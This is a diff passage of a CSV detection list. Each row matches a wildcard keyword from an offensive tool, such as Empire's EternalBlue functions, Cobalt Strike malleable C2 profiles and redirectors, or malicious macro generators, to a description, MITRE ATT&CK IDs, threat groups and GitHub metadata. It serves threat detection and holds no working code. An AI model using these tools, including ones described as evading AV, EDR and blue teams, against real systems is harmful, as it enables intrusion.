T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb1_free_hole_session_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb1_nt_trans_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb1_trans2_explo*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb2_payload_body_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb2_payload_headers_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*makebof.bat*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" "*MakeHTTPSmugglerJAR.launch*","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","N/A","7","668","108","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z" -"*malicious.csproj*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1393","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" +"*malicious.csproj*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1395","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" "*malicious.dll*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*MaliciousMacroGenerator*","offensive_tool_keyword","MaliciousMacroGenerator","Simple utility design to generate obfuscated macro that also include a AV / Sandboxes escape mechanism.","T1027 - T1564 - T1127 - T1059 - T1562","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator","1","0","N/A","N/A","9","808","210","2019-04-17T19:47:38Z","2016-09-21T23:18:14Z" "*MaliciousMacroMSBuild-master*","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","1","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" "*Malleable C2 Files*","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","149","40","2021-03-29T07:00:00Z","2019-02-22T09:36:44Z" "*Malleable PE/Stage*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" -"*malleable_redirector.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" -"*malleable_redirector_hidden_api_endpoint*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*malleable_redirector.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*malleable_redirector_hidden_api_endpoint*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*Malleable-C2-Profiles*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Malleable-C2-Randomizer*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*Malleable-C2-Randomizer*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*malleable-c2-randomizer.py*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" "*MalleableProfileB64*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*MalleableProfiles.vue*","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" -"*malleable-redirector-config*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*malleable-redirector-config*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 